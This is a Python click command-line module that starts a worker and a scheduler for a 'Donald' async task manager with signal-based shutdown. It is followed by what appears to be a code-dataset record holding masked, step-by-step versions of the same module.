        # Block until the wrapped coroutine finishes and forward its result.
        return ctx.obj["loop"].run_until_complete(fn(ctx, *args, **kwargs))

    return _runner
@click.group()
@click.option(
    "-M",
    "--manager",
    "manager",
    required=True,
    help="Python path to the manager",
)
@click.pass_context
def cli(ctx: click.Context, manager: str):
    """Root command group: import the manager and store it on the context."""
    imported = import_manager(manager)
    ctx.obj["manager"] = imported
@cli.command(help="Launch a worker")
@click.option("-S", "--scheduler", "scheduler", is_flag=True, help="Start a scheduler")
@process_await
async def worker(ctx: click.Context, *, scheduler: bool = False, **params):
    """Launch a worker."""
    event_loop = ctx.obj["loop"]

    async def _shutdown():
        # Remove the handlers up front so a second signal is a no-op.
        event_loop.remove_signal_handler(signal.SIGTERM)
        event_loop.remove_signal_handler(signal.SIGINT)
        await worker.stop()
        if scheduler:
            await manager.scheduler.stop()
        await manager.stop()

    event_loop.add_signal_handler(
        signal.SIGINT, lambda: event_loop.create_task(_shutdown())
    )
    event_loop.add_signal_handler(
        signal.SIGTERM, lambda: event_loop.create_task(_shutdown())
    )

    manager: Donald = ctx.obj["manager"]
    await manager.start()
    if scheduler:
        manager.scheduler.start()

    # NOTE: `worker` shadows this command function; _shutdown() refers to
    # this worker instance once it is bound.
    worker = manager.create_worker(show_banner=True, **params)
    worker.start()
    await worker.wait()
@cli.command(help="Launch a scheduler")
@process_await
async def scheduler(ctx: click.Context):
    """Run only the manager's scheduler until a stop signal arrives."""
    event_loop = ctx.obj["loop"]

    async def _shutdown():
        # Remove the handlers up front so a second signal is a no-op.
        event_loop.remove_signal_handler(signal.SIGTERM)
        event_loop.remove_signal_handler(signal.SIGINT)
        await manager.scheduler.stop()
        await manager.stop()

    event_loop.add_signal_handler(
        signal.SIGINT, lambda: event_loop.create_task(_shutdown())
    )
    event_loop.add_signal_handler(
        signal.SIGTERM, lambda: event_loop.create_task(_shutdown())
    )

    manager: Donald = ctx.obj["manager"]
    await manager.start()
    manager.scheduler.start()
    await manager.scheduler.wait()
def main():
    """CLI entry point: build a fresh event loop and pass it to click.

    The loop is shared with the commands via ``ctx.obj["loop"]``.
    """
    # asyncio.get_event_loop() is deprecated when no loop is running
    # (Python 3.10+); create one explicitly and install it as the current
    # loop so other code that asks for it gets the same instance.
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    cli(obj={"loop": loop})


if __name__ == "__main__":
    main()
|
flexible
|
{
"blob_id": "3da4896f368f067a339db5cc89201c93ba8166ce",
"index": 6220,
"step-1": "<mask token>\n\n\ndef process_await(fn: Callable[..., Awaitable[TV]]) ->Callable[..., TV]:\n\n @wraps(fn)\n @click.pass_context\n def wrapper(ctx, *args, **kwargs):\n loop = ctx.obj['loop']\n return loop.run_until_complete(fn(ctx, *args, **kwargs))\n return wrapper\n\n\n@click.group()\n@click.option('-M', '--manager', 'manager', required=True, help=\n 'Python path to the manager')\n@click.pass_context\ndef cli(ctx: click.Context, manager: str):\n ctx.obj['manager'] = import_manager(manager)\n\n\n<mask token>\n\n\ndef main():\n loop = asyncio.get_event_loop()\n cli(obj={'loop': loop})\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef import_manager(path: str) ->Donald:\n \"\"\"Import a manager from a python path.\"\"\"\n manager: Donald = import_obj(path)\n return manager\n\n\ndef process_await(fn: Callable[..., Awaitable[TV]]) ->Callable[..., TV]:\n\n @wraps(fn)\n @click.pass_context\n def wrapper(ctx, *args, **kwargs):\n loop = ctx.obj['loop']\n return loop.run_until_complete(fn(ctx, *args, **kwargs))\n return wrapper\n\n\n@click.group()\n@click.option('-M', '--manager', 'manager', required=True, help=\n 'Python path to the manager')\n@click.pass_context\ndef cli(ctx: click.Context, manager: str):\n ctx.obj['manager'] = import_manager(manager)\n\n\n<mask token>\n\n\ndef main():\n loop = asyncio.get_event_loop()\n cli(obj={'loop': loop})\n\n\n<mask token>\n",
"step-3": "<mask token>\nif TYPE_CHECKING:\n from donald.manager import Donald\n from .types import TV\n\n\ndef import_manager(path: str) ->Donald:\n \"\"\"Import a manager from a python path.\"\"\"\n manager: Donald = import_obj(path)\n return manager\n\n\ndef process_await(fn: Callable[..., Awaitable[TV]]) ->Callable[..., TV]:\n\n @wraps(fn)\n @click.pass_context\n def wrapper(ctx, *args, **kwargs):\n loop = ctx.obj['loop']\n return loop.run_until_complete(fn(ctx, *args, **kwargs))\n return wrapper\n\n\n@click.group()\n@click.option('-M', '--manager', 'manager', required=True, help=\n 'Python path to the manager')\n@click.pass_context\ndef cli(ctx: click.Context, manager: str):\n ctx.obj['manager'] = import_manager(manager)\n\n\n@cli.command(help='Launch a worker')\n@click.option('-S', '--scheduler', 'scheduler', is_flag=True, help=\n 'Start a scheduler')\n@process_await\nasync def worker(ctx: click.Context, *, scheduler: bool=False, **params):\n \"\"\"Launch a worker.\"\"\"\n loop = ctx.obj['loop']\n\n async def stop():\n loop.remove_signal_handler(signal.SIGTERM)\n loop.remove_signal_handler(signal.SIGINT)\n await worker.stop()\n if scheduler:\n await manager.scheduler.stop()\n await manager.stop()\n loop.add_signal_handler(signal.SIGINT, lambda : loop.create_task(stop()))\n loop.add_signal_handler(signal.SIGTERM, lambda : loop.create_task(stop()))\n manager: Donald = ctx.obj['manager']\n await manager.start()\n if scheduler:\n manager.scheduler.start()\n worker = manager.create_worker(show_banner=True, **params)\n worker.start()\n await worker.wait()\n\n\n@cli.command(help='Launch a scheduler')\n@process_await\nasync def scheduler(ctx: click.Context):\n loop = ctx.obj['loop']\n\n async def stop():\n loop.remove_signal_handler(signal.SIGTERM)\n loop.remove_signal_handler(signal.SIGINT)\n await manager.scheduler.stop()\n await manager.stop()\n loop.add_signal_handler(signal.SIGINT, lambda : loop.create_task(stop()))\n loop.add_signal_handler(signal.SIGTERM, 
lambda : loop.create_task(stop()))\n manager: Donald = ctx.obj['manager']\n await manager.start()\n manager.scheduler.start()\n await manager.scheduler.wait()\n\n\ndef main():\n loop = asyncio.get_event_loop()\n cli(obj={'loop': loop})\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from __future__ import annotations\nimport asyncio\nimport signal\nfrom functools import wraps\nfrom typing import TYPE_CHECKING, Awaitable, Callable\nimport click\nfrom .utils import import_obj\nif TYPE_CHECKING:\n from donald.manager import Donald\n from .types import TV\n\n\ndef import_manager(path: str) ->Donald:\n \"\"\"Import a manager from a python path.\"\"\"\n manager: Donald = import_obj(path)\n return manager\n\n\ndef process_await(fn: Callable[..., Awaitable[TV]]) ->Callable[..., TV]:\n\n @wraps(fn)\n @click.pass_context\n def wrapper(ctx, *args, **kwargs):\n loop = ctx.obj['loop']\n return loop.run_until_complete(fn(ctx, *args, **kwargs))\n return wrapper\n\n\n@click.group()\n@click.option('-M', '--manager', 'manager', required=True, help=\n 'Python path to the manager')\n@click.pass_context\ndef cli(ctx: click.Context, manager: str):\n ctx.obj['manager'] = import_manager(manager)\n\n\n@cli.command(help='Launch a worker')\n@click.option('-S', '--scheduler', 'scheduler', is_flag=True, help=\n 'Start a scheduler')\n@process_await\nasync def worker(ctx: click.Context, *, scheduler: bool=False, **params):\n \"\"\"Launch a worker.\"\"\"\n loop = ctx.obj['loop']\n\n async def stop():\n loop.remove_signal_handler(signal.SIGTERM)\n loop.remove_signal_handler(signal.SIGINT)\n await worker.stop()\n if scheduler:\n await manager.scheduler.stop()\n await manager.stop()\n loop.add_signal_handler(signal.SIGINT, lambda : loop.create_task(stop()))\n loop.add_signal_handler(signal.SIGTERM, lambda : loop.create_task(stop()))\n manager: Donald = ctx.obj['manager']\n await manager.start()\n if scheduler:\n manager.scheduler.start()\n worker = manager.create_worker(show_banner=True, **params)\n worker.start()\n await worker.wait()\n\n\n@cli.command(help='Launch a scheduler')\n@process_await\nasync def scheduler(ctx: click.Context):\n loop = ctx.obj['loop']\n\n async def stop():\n loop.remove_signal_handler(signal.SIGTERM)\n 
loop.remove_signal_handler(signal.SIGINT)\n await manager.scheduler.stop()\n await manager.stop()\n loop.add_signal_handler(signal.SIGINT, lambda : loop.create_task(stop()))\n loop.add_signal_handler(signal.SIGTERM, lambda : loop.create_task(stop()))\n manager: Donald = ctx.obj['manager']\n await manager.start()\n manager.scheduler.start()\n await manager.scheduler.wait()\n\n\ndef main():\n loop = asyncio.get_event_loop()\n cli(obj={'loop': loop})\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from __future__ import annotations\n\nimport asyncio\nimport signal\nfrom functools import wraps\nfrom typing import TYPE_CHECKING, Awaitable, Callable\n\nimport click\n\nfrom .utils import import_obj\n\nif TYPE_CHECKING:\n from donald.manager import Donald\n\n from .types import TV\n\n\ndef import_manager(path: str) -> Donald:\n \"\"\"Import a manager from a python path.\"\"\"\n manager: Donald = import_obj(path)\n return manager\n\n\ndef process_await(fn: Callable[..., Awaitable[TV]]) -> Callable[..., TV]:\n @wraps(fn)\n @click.pass_context\n def wrapper(ctx, *args, **kwargs):\n loop = ctx.obj[\"loop\"]\n return loop.run_until_complete(fn(ctx, *args, **kwargs))\n\n return wrapper\n\n\n@click.group()\n@click.option(\n \"-M\",\n \"--manager\",\n \"manager\",\n required=True,\n help=\"Python path to the manager\",\n)\n@click.pass_context\ndef cli(ctx: click.Context, manager: str):\n ctx.obj[\"manager\"] = import_manager(manager)\n\n\n@cli.command(help=\"Launch a worker\")\n@click.option(\"-S\", \"--scheduler\", \"scheduler\", is_flag=True, help=\"Start a scheduler\")\n@process_await\nasync def worker(ctx: click.Context, *, scheduler: bool = False, **params):\n \"\"\"Launch a worker.\"\"\"\n\n loop = ctx.obj[\"loop\"]\n\n async def stop():\n loop.remove_signal_handler(signal.SIGTERM)\n loop.remove_signal_handler(signal.SIGINT)\n await worker.stop()\n if scheduler:\n await manager.scheduler.stop()\n await manager.stop()\n\n loop.add_signal_handler(signal.SIGINT, lambda: loop.create_task(stop()))\n loop.add_signal_handler(signal.SIGTERM, lambda: loop.create_task(stop()))\n\n manager: Donald = ctx.obj[\"manager\"]\n await manager.start()\n if scheduler:\n manager.scheduler.start()\n\n worker = manager.create_worker(show_banner=True, **params)\n worker.start()\n\n await worker.wait()\n\n\n@cli.command(help=\"Launch a scheduler\")\n@process_await\nasync def scheduler(ctx: click.Context):\n loop = ctx.obj[\"loop\"]\n\n async def stop():\n 
loop.remove_signal_handler(signal.SIGTERM)\n loop.remove_signal_handler(signal.SIGINT)\n await manager.scheduler.stop()\n await manager.stop()\n\n loop.add_signal_handler(signal.SIGINT, lambda: loop.create_task(stop()))\n loop.add_signal_handler(signal.SIGTERM, lambda: loop.create_task(stop()))\n\n manager: Donald = ctx.obj[\"manager\"]\n await manager.start()\n\n manager.scheduler.start()\n await manager.scheduler.wait()\n\n\ndef main():\n loop = asyncio.get_event_loop()\n cli(obj={\"loop\": loop})\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.